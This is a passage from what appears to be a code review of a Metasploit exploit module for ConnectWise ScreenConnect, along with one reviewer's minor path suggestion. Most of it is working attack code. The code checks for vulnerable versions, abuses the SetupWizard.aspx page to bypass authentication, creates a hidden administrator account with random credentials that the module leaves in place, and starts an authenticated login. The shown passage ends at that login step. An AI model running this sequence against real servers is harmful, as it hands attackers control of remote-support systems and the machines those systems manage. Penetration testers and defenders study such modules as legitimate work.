modules/exploits/windows/http/connectwise_screenconnect_rce.rb

```diff
@@ -0,0 +1,298 @@
+
+      if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')
+        return CheckCode::Appears(detected)
+      end
+
+      return CheckCode::Safe(detected)
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    #
+    # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.
+    #
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 1.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view state from request 1.')
+    end
+
+    #
+    # 2. Advance to the next step in the setup.
+    #
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 2.')
+    end
+
+    viewstate, viewstategen = get_viewstate(res)
+    unless viewstate && viewstategen
+      fail_with(Failure::UnexpectedReply, 'Did not locate the view state from request 2.')
+    end
+
+    #
+    # 3. Create a new administrator account.
+    #
+    admin_username = Rex::Text.rand_text_alpha_lower(8)
+    admin_password = Rex::Text.rand_text_alphanumeric(16)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        '__VIEWSTATEGENERATOR' => viewstategen,
+        'ctl00$Main$wizard$userNameBox' => admin_username,
+        'ctl00$Main$wizard$emailBox' => "#{admin_username}@#{Rex::Text.rand_text_alpha_lower(8)}.#{Rex::Text.rand_text_alpha_lower(3)}",
+        'ctl00$Main$wizard$passwordBox' => admin_password,
+        'ctl00$Main$wizard$verifyPasswordBox' => admin_password,
+        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from request 3.')
+    end
+
+    print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")
+
+    #
+    # 4. Log in with this account to get an authenticated HTTP session.
+    #
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Administration'),
```

Comment:
Not a blocker; Looks like most modules don't supply this :shrug:

```suggestion
      'uri' => normalize_uri(target_uri.path, 'Administration'),
```